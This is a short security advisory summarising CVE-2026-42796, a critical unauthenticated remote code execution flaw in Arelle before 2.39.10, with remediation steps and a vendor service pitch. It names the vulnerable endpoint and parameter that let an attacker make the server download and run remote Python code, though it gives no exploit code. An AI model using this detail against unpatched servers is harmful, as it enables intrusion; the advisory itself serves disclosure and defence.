Summary
| Parameter | Value |
|---|---|
| CVE ID | CVE-2026-42796 |
| Alert Source | GitHub Advisory - Critical Vulnerability |
| CVE Publication Year | 2026 |
| Date Published | 2026-05-04 |
| Vendor | Arelle |
| Product | Arelle |
| CVSS Score | 9.8 (critical) |
| EPSS Score | No data |
| CISA KEV | No |
| Ransomware | Not confirmed |
Vulnerability Description
Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.
Required Actions
Update Arelle to version 2.39.10 or later immediately. Until the patch is deployed, block access to the /rest/configure endpoint at the reverse proxy or web application firewall, and run the Arelle server only in an isolated network segment. Review server logs for requests to /rest/configure carrying unusual plugins parameter values.
Who Is Affected?
This vulnerability affects Arelle in versions prior to 2.39.10. Check whether your organization uses Arelle to process XBRL reports and update the installation without delay.
Sources
Need help securing your systems? nFlo team offers vulnerability management and 24/7 SOC services. Contact us.
